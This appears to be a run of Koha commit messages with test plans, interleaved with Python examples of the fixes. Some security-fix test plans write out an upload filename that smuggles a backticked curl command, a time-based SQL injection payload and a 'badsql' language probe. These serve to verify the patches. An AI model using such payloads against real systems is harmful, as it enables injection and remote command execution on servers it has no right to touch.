Linking an authority subfield to an authorized value just leaves a blank
in the form rather than creating a <select>, because there's a stray cud-
in the type returned from build_authorized_values_list.
Test plan:
1. Without the patch, Administration - Authority types - Actions menu for
Default - MARC Structure
2. Actions menu for 040 - Subfields
3. Edit subfields - Tab b - Authorized value - set to LANG - Save changes
4. Authorities - New authority - Default
5. In 040 tag, click CATALOGING SOURCE to expand the tag
6. Note that subfield b has a blank space rather than a dropdown menu
7. Apply patch, restart_all
8. Authorities - New authority - Default
9. In 040 tag, click CATALOGING SOURCE to expand the tag
10. Note that subfield b has a dropdown menu listing language names
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Test plan:
1. In Administration - Patron attribute types verify you have the default
SHOW_BCODE using the YES_NO authorized value
2. Tools - Batch patron modification, add a patron card number or
borrowernumber and continue
3. For Patron attribute select Show barcode on the summary screen item
listings, and note that you get a blank text input rather than a select
menu with Yes and No choices
4. Apply patch, restart_all
5. Repeat step 2 and 3, but note that you now get a Yes/No select menu
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Adjust aqbudgets.pl and currency.pl to check for the correct op value
To test:
Part 1 - Delete a fund
1. Go to Acquisitions > Funds
2. Try to delete a fund
--> Confirmation page shows fund name as '' and fund amount as 0.00
3. Click "Yes, delete this fund"
--> The fund is still there
Part 2 - Delete a currency
3. Go to Acquisitions > Currencies
4. Try to delete a currency
--> Confirmation shows empty values for currency and rate
5. Click, "Yes, delete this currency"
--> An error message appears and the currency is not deleted
6. Apply patch and restart_all
7. Repeat steps 1-5
--> Confirmation pages display correct information, and deletions
occur successfully
Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
The scripts for managing both bib and authority frameworks are now expecting
an op 'cud-delete_confirm' but delete_confirm isn't cud, it's just a GET of a
page asking if you are sure. The scripts just need to expect the op they are
actually getting, delete_confirm.
Test plan:
1. Administration - MARC bibliographic framework - New framework
2. Give the framework any code and description and Submit
3. Actions menu for your new framework - Delete
4. Note the message says 'Confirm deletion of framework '' ()?" rather than
having the code and description included.
5. Click Yes, note that deleting failed
6. Administration - Authority types - New authority type
7. Give the authority type any type and description and Submit
8. Actions menu for your authority type - Delete
9. Note the message again says '' () rather than 'desc' (FOO)
10. Click yes, note that deleting failed
11. Finally! Apply patch, reset_all
12. Repeat steps 1-10, this time noting that you get 'desc' (FOO) rather than
'' (), and that deleting works.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test:
1. Go to Acquisitions > EDI Accounts
2. Create an EDI account if one is not already there
3. Try to delete the EDI account
--> Page refreshes and nothing happens
4. Apply patch, restart_all, and refresh the page
5. Try to delete the EDI account again
--> A confirmation page displays with correct information
6. Click "Yes, delete"
--> The EDI account is deleted
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
For reasons unknown, GetOptions is inserting an empty string into the letter_code list. If you are running the script with a letter code filter, the empty string is added to the OR so it functions. If no letter_code is passed, the search requires the letter code to be an empty string, which will of course fail. Even more perplexing is that this does not happen for the type list which is essentially identical code.
Test Plan:
1) Generate some messages in the message queue
2) Run `process_message_queue.pl -v -c`
3) Note nothing happens
4) Apply this patch
5) Repeat step 2
6) Messages are sent!
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This removes the MySQLism for FIELD(..).
In this case we just want to get the non-default records in
the front. So we can just test lang=default. And prevent inserting
$lang in the expression. And so prevent execution in ORDER BY.
No longer needing the ->quote call too.
Test plan:
Run Koha/AdditionalContents.t again.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Test plan:
Run Koha/AdditionalContents.t without next patch.
Should fail on the sleep execution.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Same change.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Test plan:
Try to access opac-page.pl with a language not in OPACLanguages.
Verify that this 'language' was not passed to sql. Simplest perhaps
by debugging AdditionalContent.pm. Something like:
sub translated_content {
my ( $self, $lang ) = @_;
+warn "L137: $lang";
Now have a public additional_contents page and hit it:
/cgi-bin/koha/opac-page.pl?page_id=5&language=badsql
Check your log and find:
[2024/05/16 07:25:53] [WARN] L137: en at [etc] line 137.
So badsql was caught.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
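The two AdditionalContents fixes described in the commits above (nothing derived from `$lang` in the ORDER BY text, and a requested language outside OPACLanguages never reaching SQL) are sketched here as an added example that is not Koha's code. Python with sqlite3 stands in for Perl and DBIx::Class; the table layout, `OPAC_LANGUAGES`, the "before" query shape and all function names are assumptions.

```python
import sqlite3

# Assumed stand-in for the OPACLanguages system preference.
OPAC_LANGUAGES = ("en", "fr-FR", "de-DE")
FALLBACK_LANG = "en"


def resolve_language(requested):
    """Allow-list check: anything not enabled falls back, as 'badsql' did."""
    return requested if requested in OPAC_LANGUAGES else FALLBACK_LANG


def make_db():
    """Constructed sample data: one page with a default and two translations."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE localization (page_id INTEGER, lang TEXT, title TEXT)")
    db.executemany(
        "INSERT INTO localization VALUES (?, ?, ?)",
        [(5, "default", "Welcome"), (5, "fr-FR", "Bienvenue"), (5, "en", "Hello")],
    )
    return db


def build_unsafe(page_id, lang):
    """'Before' shape (assumed): lang is formatted into the ORDER BY text."""
    sql = (
        "SELECT title FROM localization WHERE page_id = ? "
        "AND lang IN ('default', ?) "
        "ORDER BY CASE lang WHEN '%s' THEN 0 ELSE 1 END" % lang
    )
    return sql, (page_id, lang)


def build_safe(page_id, lang):
    """'After' shape: constant ORDER BY, lang is only ever a bound value."""
    sql = (
        "SELECT title FROM localization WHERE page_id = ? "
        "AND lang IN ('default', ?) "
        "ORDER BY lang = 'default'"  # false (0) sorts first: non-default rows lead
    )
    return sql, (page_id, lang)


def translated_title(db, page_id, requested_lang):
    """Pick the translation if present, otherwise the default record."""
    lang = resolve_language(requested_lang)
    sql, params = build_safe(page_id, lang)
    row = db.execute(sql + " LIMIT 1", params).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for requested in ("fr-FR", "de-DE", "badsql"):
        print(requested, "->", translated_title(db, 5, requested))
    # The safe statement text is identical whatever the caller sends.
    print(build_safe(5, "en")[0] == build_safe(5, "bad'sql")[0])
```

Comparing the statement text for two different inputs, as the last line does, is a quick review check for any query builder: if the text changes with the input, the input is part of the SQL.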
To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no remote execution occurs
7/ Test uploading actual zip file and images still works
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
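What "the filename is now escaped" buys in the commit above, as an added example that is not Koha's code: Python's `shlex.quote` and an argument vector stand in for the Perl fix, and the sample filename, the harmless `echo` marker and the function names are constructed for illustration.

```python
import shlex
import subprocess

# Constructed upload name; the backticks wrap a harmless echo as a marker.
SAMPLE_NAME = "cover`echo INJECTED`.zip"


def through_shell(filename, escape):
    """Hand the name to `sh -c`, as an interpolated command string would."""
    arg = shlex.quote(filename) if escape else filename
    done = subprocess.run(
        ["sh", "-c", "printf %s " + arg],
        capture_output=True, text=True, check=True,
    )
    return done.stdout


def through_argv(filename):
    """No shell at all: the name is one argv element and is never parsed."""
    done = subprocess.run(
        ["printf", "%s", filename],
        capture_output=True, text=True, check=True,
    )
    return done.stdout


def shell_rewrote_name(filename, escape):
    """True when the shell changed the name, i.e. part of it was executed."""
    return through_shell(filename, escape) != filename


if __name__ == "__main__":
    print("unescaped:", through_shell(SAMPLE_NAME, escape=False))
    print("escaped:  ", through_shell(SAMPLE_NAME, escape=True))
    print("argv:     ", through_argv(SAMPLE_NAME))
```

The argument-vector form is the sturdier of the two, because it removes the shell parsing step instead of relying on every call site to quote correctly.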
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Actually in _get_tt_params
The following query will delay the response
SELECT `me`.`biblionumber`, `me`.`frameworkcode`, `me`.`author`, `me`.`title`, `me`.`medium`, `me`.`subtitle`, `me`.`part_number`, `me`.`part_name`, `me`.`unititle`, `me`.`notes`, `me`.`serial`, `me`.`seriestitle`
, `me`.`copyrightdate`, `me`.`timestamp`, `me`.`datecreated`, `me`.`abstract`
FROM `biblio` `me`
WHERE `biblionumber` = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -'
ORDER BY field( biblionumber, 1 ) AND (
SELECT 1
FROM
SELECT SLEEP( 6 ) x
) -- - )
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch refactors checkpw_internal to remove the SQL code, use patron objects, and return the
patron that correctly matches the userid/cardnumber when auth is successful
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch moves some patron fetching code in C4/Auth to use the patron returned from the validation
methods and only try to fetch the patron (to check if locked, update attempts, etc) if we didn't authenticate
To test:
1 - Set a user to have userid = BANANA password = Password1
2 - Set a user to have cardnumber = BANANA password = Password2
3 - Hit the patron authentication API:
http://localhost:8080/api/v1/auth/password/validation
with data:
{ "identifier": "BANANA", "password":"Password1" }
and:
{ "identifier": "BANANA", "password":"Password2" }
4 - Note you receive the same response for both
5 - Apply patch, restart all
6 - Repeat the API and confirm you get the correct patron for the password submitted
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
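The identifier collision from the test plan above (one patron's userid equal to another patron's cardnumber), as an added example that is not Koha's code: the patron records, the PBKDF2 hashing and both function shapes are assumptions made to show why the validator must return the record whose password matched.

```python
import hashlib
import hmac

SALT = b"constructed-demo-salt"  # fixed only so the sample data is reproducible


def hash_pw(password):
    # PBKDF2 from the standard library is a stand-in, not Koha's scheme.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 10_000)


# Constructed patrons mirroring the test plan: BANANA is a userid for one
# patron and a cardnumber for another, each with a different password.
PATRONS = [
    {"patron_id": 1, "userid": "BANANA", "cardnumber": "1001",
     "pw": hash_pw("Password1")},
    {"patron_id": 2, "userid": "apple", "cardnumber": "BANANA",
     "pw": hash_pw("Password2")},
]


def candidates(identifier):
    """Every patron the identifier could refer to, by userid or cardnumber."""
    return [p for p in PATRONS if identifier in (p["userid"], p["cardnumber"])]


def password_ok(patron, password):
    return hmac.compare_digest(patron["pw"], hash_pw(password))


def validate_before(identifier, password):
    """Assumed pre-patch shape: verify, then look the patron up a second time."""
    if not any(password_ok(p, password) for p in candidates(identifier)):
        return None
    return candidates(identifier)[0]["patron_id"]  # independent lookup, first hit


def validate_after(identifier, password):
    """Post-patch shape: hand back the very record that authenticated."""
    for patron in candidates(identifier):
        if password_ok(patron, password):
            return patron["patron_id"]
    return None


if __name__ == "__main__":
    for pw in ("Password1", "Password2", "wrong"):
        print(pw, validate_before("BANANA", pw), validate_after("BANANA", pw))
```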
This test is useless it seems, it is not testing background jobs
behaviour.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We usually test if C4::Context->userenv, so we need to undef when
unsetting, not {} (evaluated true)
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern in Koha::Database
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern, remove dbh stack
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We are not using it and it's confusing, let's remove the context stack.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
TODO - better review C4::Auth's changes. Are all the removal of
_new_userenv correct/enough?
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
To test:
1. Go to circ/circulation.pl and check an item out to a patron.
2. Backdate it to sometime in the past using the "Specify due date
(MM/DD/YYYY) : " input
3. A modal appears to "Please confirm checkout". The date is no longer
populated in that field.
4. You must add the date again here.
5. APPLY PATCH
6. Try again and this time the confirmation date should be set
correctly.
7. Follow the test plan from Bug 18885 to make sure on site checkouts
still work correctly.
Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We're copying permissions not settings here, so it makes sense to make
that clear in the wording.
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch moves the 'PlaceHoldsOnOrdersFromSuggestions' system preferences
from the Acquisitions->Printing section to the Circulation->Holds Policy section.
To test:
1) Go to Admin->System Preferences and search for 'PlaceHoldsOnOrdersFromSuggestions'
2) Note that it is located in the Acquisitions prefs, under the Printing subheading
3) Apply patch
4) search for the preferences again
5) Note that it is now located in the Circulation preferences under the Holds Policy subheading
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch updates the comments of course_items.location and
course_items.enabled to say "reserve" instead of "reseve".
To test in ktd:
- sudo koha-mysql kohadev
- Run: "SHOW CREATE TABLE course_items;"
- Verify the comments of "location" and "enabled" contains
"reseve" instead of "reserve"
- Make a note of the definitions of these two columns
- Run the atomicupdate: "sudo koha-upgrade-schema kohadev"
- Log into the database again and run the same command as above
- Verify the comments now say "reserve" instead of "reseve"
- Make sure the column definitions are otherwise identical to
the ones you saw before the upgrade. Only the spelling of
"reserve" in the comment should be changed.
Signed-off-by: David Nind <david@davidnind.com>
Removed unnecessary line of debug output. 2024-06-10 Magnus Enger
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep 'reseve'. Notice there are instances of 'reseve'
2. Apply patch
3. Repeat step 1, there should be no instances of 'reseve'
Sponsored-by: Catalyst IT, New Zealand
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep -n -E 'barocode|preproccess' to find the files and line # of typos
2. Apply the patch
3. git grep -E 'barocode|proccess'
4. See no results
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This makes the hint when entering an SMS number on the OPAC messaging
settings page the same as the staff interface hint: "Please enter
numbers only. Prefix the number with + or 00 if including the country
code." For some countries using either +XX or 00XX are accepted,
for example: +49 or 0049.
Test plan:
1. Set the SMSSendDriver system preference to Email
2. View the current hint for entering an SMS number in the staff
interface:
2.1 Go to Patrons > + New patron > Patron.
2.2 Scroll down to the 'Patron messaging preferences' section at the
end of the page.
2.3 Note that the hint is "Please enter numbers only. Prefix the
number with + or 00 if including the country code.".
3. View the current hint for entering an SMS number in the OPAC:
3.1 Go to the OPAC > Your account (log in if required).
3.2 Select the 'Messaging' tab/section.
3.3 Note that the hint is "Please enter numbers only. Prefix the
number with + if including the country code.".
3.4 The difference: "..or 00.." is missing.
4. Apply the patch.
5. Refresh the OPAC messaging page.
6. The hint text for the OPAC is now the same as the staff interface.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Sam Lau <samalau@gmail.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
The date field for patron attributes is now repeatable (enhancement made
in Koha 24.05 with bug 32610). This updates the hint text to reflect
the change.
Test plan:
1. Go to add a patron attribute (Administration > Patrons and
circulation > Patron attribute types > + New patron attribute type )
2. Note that the hint for the "Is a date" field says "...Date attributes
cannot be repeatable or linked to an authorised value category.".
3. Apply the patch.
4. Reload the page.
5. Note that the hint now says "...Date attributes are repeatable,
but cannot be linked to an authorised value category."
6. Sign off D:
PA amended: 'are repeatable' -> 'can be repeatable'
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Update the error message for the web installer onboarding
section when creating the Koha administrator patron (where
the card number or username already exists):
- Fix capitalization
- Use the same label in the error message as used in
the form
Error message before: The patron has not been created!
Card number or Userid may already exist.
Error message after: The patron was not created! The
card number or username already exists.
Test plan:
1. Option 1:
1.1 Review the diff for the patch and make sure that
the updated text makes sense.
. Previous text: The patron has not been created!
Card number or Userid may already exist.
. Updated text: The patron was not created! The
card number or username already exists.
OR
2. Option 2:
2.1 Access the database server:
mysql -uroot -ppassword -hkoha-db-1
2.2 Drop the koha_kohadev database:
drop database koha_kohadev;
2.3 Create the database: create database koha_kohadev;
2.4 Add privileges (for a real installation this would
be limited):
grant all on koha_kohadev.* to koha_kohadev;
2.5 Restart everything (there may be some errors listed):
flush_memcached and then restart_all
2.6 Access the web installer: go to 127.0.0.1:8081
2.7 Use the database user name and password: get from
/etc/koha/sites/kohadev/koha-conf.xml
(default: koha_kohadev, password)
2.8 Continue through the installation process until you
reach 'Selecting default settings':
. Make appropriate selections to use all the sample
data options and settings
2.9 For the 'Onboarding' step - Create Koha
administrator patron:
. Surname: Acevedo
. First name: Henry
. Card number: make up a number that doesn't exist in
the sample data, for example: 741852963
. Library: Centerville
. Patron category: Staff
. Username: 23529000035676 (this is an existing
value already in the sample data)
. Password: a valid password, for example:
KohaCon2024
. Confirm password: repeat password used
. Submit
==> Error message before patch: The patron has not
been created! Card number or Userid may
already exist.
2.10 Apply the patch.
2.11 Repeat step 2.9
2.12 The error message is now: The patron was not created!
The card number or username already exists.
3. Sign off.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
In the Item search the librarian is allowed, in the first step, to define
additional filters like Title, Author, Publisher, Publication date etc.
(in the third fieldset). This works fine but only for one criterion.
If one adds two or more criteria, the filter does not apply at all.
Test plan
=========
1. Make an Item search with the Publisher filter. Put
%University of California% as the value.
You should get 5 rows (with standard ktd test data set), three
from 1982, and two from 1988.
2. Edit search -> add the second criterion: AND Publication date is 1982.
You would expect three rows but you get 900+ rows.
3. Apply the patch; restart_all.
4. Repeat p. 2. You should get the expected three rows.
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Fix a spelling error in the opacreadinghistory system preference
description - 'itms' to 'items'.
Test plan:
1. In the staff interface view the description for the
opacreadinghistory system preferences (Koha administration >
System preferences > search for opacreadinghistory).
2. Note that it reads "Allow patrons to see what itms they have
checked out in the past."
3. Apply the patch.
4. Refresh the page.
5. Note that 'itms' is now spelt correctly as 'items'.
6. Sign off.
Signed-off-by: Laura Escamilla <laura.escamilla@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
If you enabled AutoLocation and have a branch without ip, this
triggers warnings.
Test plan:
Check logs in this situation with/without this patch by logging out
and in again on staff.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>